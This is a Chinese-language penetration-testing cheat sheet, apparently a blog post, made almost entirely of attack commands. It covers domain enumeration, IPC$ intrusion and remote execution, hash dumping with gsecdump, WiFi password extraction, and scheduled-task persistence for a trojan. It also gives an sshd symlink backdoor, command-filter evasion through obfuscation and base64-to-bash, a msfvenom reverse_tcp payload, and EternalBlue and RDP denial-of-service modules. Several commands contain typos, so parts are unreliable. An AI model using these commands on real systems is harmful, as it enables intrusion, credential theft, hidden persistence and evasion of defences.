1.域常用操作命令:
net group /domain //获得所有域用户组列表
net group qq_group /domain //显示域中qq_group组的成员
net group qq_group /del /domain //删除域中qq_group组
net group qq_group qq /del /domain //删除域内qq_group 群组中的成员QQ
net group qq_group /add /domain //增加域中的群组
net group "domain admins" /domain //获得域管理员列表
net group "enterprise admins" /domain //获得企业管理员列表
net localgroup administrators /domain //获取域内置administrators组用(enterprise admins、domain admins)
net group "domain controllers" /domain //获得域控制器列表
net group "domain computers" /domain //获得所有域成员计算机列表
net user /domain //获得所有域用户列表
net user someuser /domain //获得指定账户someuser的详细信息
net accounts /domain //获得域密码策略设置,密码长短,错误锁定等信息
nei view /domain //查询有几个域, 查询域列表
net view /domain:testdomain //查看 testdomain域中的计算机列表
nltest /domain_trusts //获取域信任信息
net user domain-admin /domain //查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息
net config Workstation //查询机器属于哪个域
net time /domian //查询主域服务器的时间
echo %logonserver% //查看登陆到这台服务器的计算机名
net time \\192.168.1.1 //查询远程共享主机192.168.1.1的时间
net use \\IP\ipc$ password /user:username@domain //ipc$域内连接
net view \\dc2.backlion.com //查看域控共享情况
dir \\dc2.backlion.com\SYSVOL /s /a > sysvol.txt //列出sysvol日志记录
xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c //远程拷贝到本地sysvol日志
net user /domain bk bk123 //修改域内用户密码,需要管理员权限
net localgroup administartors SEZKL\backlion /add //将SEZKL域中的用户backlion添加到administrators组中
mstsc /admin //远程桌面登录到console会话解决hash无法抓出问题
gpupdate/force //更新域策略
psexec \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u //从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来
gsecdump -a //获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值
tasklist /S ip /U domain\username /P /V //查看远程计算机进程列
2.基本内网渗透命令:
ipconfig/all //查看IP地址
ipconfig /release //释放地址
ipconfig /renew 重新获取Ip地址
whoami //查询账号所属权限
whoami/all //查看sid值
systeminfo //查询系统以及补丁信息
tasklist /svc //查看进程
taskkill /im 进程名称(cmd) //结束进程
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)
wmic qfe get hotfixid //查看已安装过得补丁,这个很实用
wmic qfe list full /format:htable > hotfixes.htm //详细的补丁安装
wmic qfe //查询补丁信息以及微软提供的下载地址
ping hostname(主机名) //显示该机器名的IP
net start //查看当前运行的服务
net user //查看本地组的用户
net localhroup administrators //查看本机管理员组有哪些用户
net user //查看会话
net session //查看当前会话
net share //查看SMB指向的路径[即共享]
wmic share get name,path //查看SMB指向的路径
wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置
net use \\IP\ipc$ password /user:username //建立IPC会话(工作组模式)
net use z: \\192.168.1.1 //建立映射到本机Z盘
net time \\172.16.16.2 //查询共享主机的是
at \\172.16.16.2 13:50 c:\windows\2009.exe //在共享主机上执行
netstat -ano //查看开放的端口
netstat -an | find “3389” //找到3389端口
net accounts //查看本地密码策略
nbtstat –A ip //netbiso查询
net view //查看机器注释或许能得到当前活动状态的机器列表,如果
禁用netbios就查看不出来
echo %PROCESSOR_ARCHITECTURE% //查看系统是32还是64位
set //查看系统环境设置变量
net start //查看当前运行的服务
wmic service list brief //查看进程服务
wmic process list brief //查看进程
wmic startup list brief //查看启动程序信息
wmic product list brief //查看安装程序和版本信息(漏洞利用线索)
wmic startup list full //识别开机启动的程序
wmic process where(description="mysqld.exe")
>>mysql.log //获取软件安装路径
for /f "skip=9 tokens=1,2 delims=:" %i in ('ne
tsh wlan showprofiles') do @echo %j | findstr
-i -v echo | netsh wlan show profiles %jkey=clear //一键获取wifi密码
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) //查看是否支持posershell
qwinsta //查看登录情况
schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7 //添加计划任务
set KB2829361=MS13-046&set KB2830290=MS13-046&setKB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&setKB3077657=MS15-077&set KB3045171=MS15-051&setKB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&setKB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f/q /a a.txt //windows未打补丁情况
REG query HKCU /v "pwd" /s //获取保存到注册表中的密码
3.内网网络结常用命令:
tracert IP //路由跟踪
route print //打印路由表
arp -a //列出本网段内所有活跃的IP地址
arp -s (ip + mac) //绑定mac与ip地址
arp -d (ip + mac) //解绑mac与ip地址
nbtscan -r 192.168.16.0/24 //通过小工具nbtscan扫描整个网络
netsh firewall show config //查看防火墙策略
netsh firewall show state //查看防火墙策略
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl" //批量扫描内网存活主机
windows自带端口转发:
netsh interface ipv6 install //首先安装IPV6(xp、2003下IPV6必须安装,否则端口转发不可用!)
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22 //将本机22到1.1.1.1的22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22
netsh interface portproxy show all // 查看转发配置
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22 //删除配置
netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all //添加防火墙规则,允许连接22:
4.敏感数据和目录:
dir /b/s config.* //查看所在目录所有config.为前缀的文件
findstr /si password *.xml *.ini *.txt //查看后缀名文件中含有password关键字的文件
findstr /si login *.xml *.ini *.txt //查看后缀名文件中含有login关键字的文件
copy con 创建命令:
copy con ftp.bat //创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功
copy con test.vbs //创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功
5.dsquery的AD查询工具:
dsquery user domainroot -limit 65535 && net user /domain //列出该域内所有用户名
dsquery server -domain super.com | dsget server -dnsname -site //搜索域内所有域控制器并显示他们的DNS主机名和站点名称
dsquery contact //寻找目录中的联系人
dsquery subnet //列出该域内网段划分
query user //查询那些用户在线
dsquery group && net group /domain //列出该域内分组
dsquery ou //列出该域内组织单位
dsquery server && net time /domain //列出该域内域控制器
dsquery site -o rdn //搜索域中所有站点的名称
dsquery group dc=super,dc=com |more //搜索在DC=SUPER,DC=COM 域中的所有组
psloggedon.exe //查询那台主机和用户登录到该主机上
netsess.exe //192.168.1.115 //远程主机上无需管理员权限,查询到主机名和用户
reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT" //获取最近mstsc登录的记录
6.DOS常用快捷命令
mspaint 画图工具
calc 计算器
notepad 记事本
taskmgr 任务管理器
osk 打开屏幕键盘
gpedit.msc 组策略
services.msc 本地服务
compmgmt.msc 计算机管理
devmgmt.msc 设备管理器
winver 查看系统版本
magnify 放大镜实用程序
eventvwr 事件查看器
Regedit 打开注册表
resmon 资源监视器
WMIC BIOS get releasedate 查看电脑生产日期
mstsc -f 远程连接(可以全屏)
7.IPC入侵
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net use \\ip\ipc$ "" /user:"" 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net time \127.0.0.25 #查时间
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
at \\127.0.0.25 10:50 srv.exe #用at命令在0点50分启动srv.exe(注意这里设置的时间要比主机时间快)
at \\127.0.0.25 10:50 "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt;
copy srv.exe \\hacden-pc\c$ #复制srv.exe到目标c盘上去
8.sshd软链接后门
1、服务端执行
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oport=12345
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oport=12345
2、客户端执行
ssh root@x.x.x.x -p 12345
#输入任意密码就可以root用户权限登陆了,如果root用户被禁止登陆时,可以利用其他存在的用户身份登陆,比如:ubuntu
检测
1、查看可疑端口
netstat -antlp
2、查看可执行文件
ls -al /tmp/su
清除
1、禁止PAM认证
vim /etc/ssh/sshd_config
UsePAM no
2、重载
/etc/init.d/sshd reload
9.linux命令bypass
使用反斜杠
w\ho\am\i
空格绕过
使用<和>
cat<>flag
cat<1.sh
使用特殊变量:$IFS
cat$IFS\flag
cat${IFS}flag
使用特殊变量${9}
${9}对应空字符串关键字过滤绕过,使用$*和$@,$x(x代表1-9),${x}(x>=10)
ca$*t flag
ca$@t flag
ca$2t flag
ca${11} flag
花括号还有一种用法:{command,argument}
{cat,flag}
使用双引号和单引号
ca"t" 1.sh
ca't' 1.sh
使用base64
echo 'Y2F0IC4vZmxhZwo=' |base64 -d |bash
使用进制
$(printf '\x00\x00\x00\x00\x00')
使用%0a(\n),%0d(\r),%09(\t)等字符也可以bypass
突破终端限制执行脚本内容:
man -P /tmp/runme.sh man
突破终端限制执行脚本中的命令:
tar cvzf a.tar.gz --checkpoint-action=exec=./a.sh --checkpoint=1 a.sh
tar c a.tar -I ./runme.sh a
CVE-2014-6271
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
awk执行系统命令三种方法:
awk 'BEGIN{system("echo abc")}'
awk 'BEGIN{print "echo","abc"| "/bin/bash"}'
awk '{"date"| getline d; print d; close("d")}'
10.cmd命令bypass
逗号------------net user
,;,%coMSPec:~ -0, +27%,; ,;, ;/b, ;;; ,/c, ,,, ;start; , ; ;/b ; , /min ,;net user
括号-----------netstat /ano | findstr LISTENING
,;,%coMSPec:~ -0, +27%,; ,;, ;/b, ;;; ,/c, ,,, ;start; , ; ;/b ; , /min ,;netstat -ano |; ,;( (,;,((findstr LISTENING)),;,) )
转义字符------------netstat /ano | findstr LISTENING
,;,%coMSPec:~ -0, +27%,; ,;, ;^^^^/^^^^b^^^^, ;;; ,^^^^/^c, ,,, ;^^st^^art^^; , ; ;/^^^^b ; , ^^^^/^^^^min ,;net^^^^stat ^^^^ ^^^^-a^^^^no ^^^^ ^|; ,;( ^ (,;^,(^(fi^^^^ndstr LIST^^^^ENING)^),;^,) ^ )
设置环境变量------
#cmd /c "set com3= &&set com2=user&&set com1=net &&call %com1%%com2%%com3%"
#cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call %com1%%com2%%com3%"
#cmd /c "set com3= &&set com2=user&&set com1=net &&call set final=%com1%%com2%%com3%&&call %final%"
随机大小写-------
CMd /C "sEt coM3= /ano&& SEt cOm2=stat&& seT CoM1=net&& caLl SeT fiNAl=%COm1%%cOm2%%coM3%&& cAlL %FinAl%"
逗号和分号---------
;,,CMd,; ,/C ", ;, ;sEt coM3= &&,,,SEt cOm2=user&&;;;seT CoM1=net &&, ;caLl,;,SeT fiNAl=%COm1%%cOm2%%coM3%&&; , ,cAlL, ;, ;%FinAl%"
将配对双引号添加到输入命令以混淆其最终命令行参数
;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e””t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (,,(c^AlL^, ;,^ ;%Fi^nAl^%))"
使用cmd.exe的/ V:ON参数启用延迟环境变量扩展
;,,C^Md^,; /V:ON,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^””e””t) ) &&set quotes=””&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) )"
11.msf命令
生成exe文件
msfveom -p windows/metepreter/reverse_tcp -a x86 --platform windows LHOST=192.168.43.63 LPORT=4444 -e x86/shikata_ga_nai -i 20 PrependMigrate=true -f exe >ma.exe
攻击3389致使蓝屏:
扫描
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
永恒之蓝漏洞拿cmd:
扫描
use auxiliary/scanner/smb/smb_ms17_010
攻击
use exploit/windows/smb/ms17_010_eternalblue 攻击win7-2003
use exploit/windows/smb/ms17_010_eternalblue_win8 攻击win8
12.运行计划任务
使用administrator创建以system用户身份运行程序的计划任务,可以运行如远控或msf后门等
命令:
schtasks /create /tn "system" /tr C:\Windows\system321.exe\system321.exe /sc MINUTE /mo 1 /ru "System" /RL HIGHEST
参数说明:
/create #创建任务
/tn "system" #指定任务名称为system
/tr C:\Windows\system321.exe\system321.exe #指定程序路径
/sc MINUTE /mo 1 #指定类型;MINUTE表示任务每n分钟运行一次,/mo 1表示每1分钟执行一次
/ru "System" #指定为system用户运行该任务
/RL HIGHEST #运行级别,HIGHEST为使用最高权限运行
后续根据要求进行添加
扫一扫
185
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
